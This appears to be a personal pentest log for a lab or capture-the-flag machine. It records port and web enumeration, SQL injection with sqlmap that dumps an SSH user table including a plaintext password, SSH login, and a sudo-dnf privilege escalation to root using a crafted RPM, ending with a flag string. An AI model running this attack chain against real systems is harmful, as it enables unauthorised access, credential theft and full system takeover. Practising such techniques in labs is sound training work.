🧪 Pentest Log: {{date:2025-08-31}}

🔍 Target Information

• Machine Name: JS01
• IP Address: 10.11.2.242
• Operating System: Linux

ip=10.11.2.242

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

LayerBB 1.1.3

Google for exploit, found

https://www.exploit-db.com/exploits/49593

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: SQLI

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

sqlmap -u "http://10.11.1.68/search.php" --data "search_query=asdfadf&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search" --batch --dump -D ssh -T ssh_users

+----+-------------------+----------+
| ID | password          | username |
+----+-------------------+----------+
| 1  | FEder1K01!@ssw0rd | Federik  |
+----+-------------------+----------+

ssh federik@$ip

🧬 Privilege Escalation

👤 Current Access

• User: federik
• Groups: 1000(federik)
• Shell Type: ssh

🔍 Enumeration

Sudo:

sudo -l

Found

User federik may run the following commands on localhost:
    (root) NOPASSWD: /usr/bin/dnf

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Sudo Abuse
• Target Binary/Service: dnf
• Reference / Source: GTFOBins

🔧 Exploit Steps

• Setup

TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

• Smash to root

sudo dnf -y --disablerepo='*' --nogpgcheck install ./x-1.0-1.noarch.rpm

• Key File

b3g7bnca98utgbk2dy9c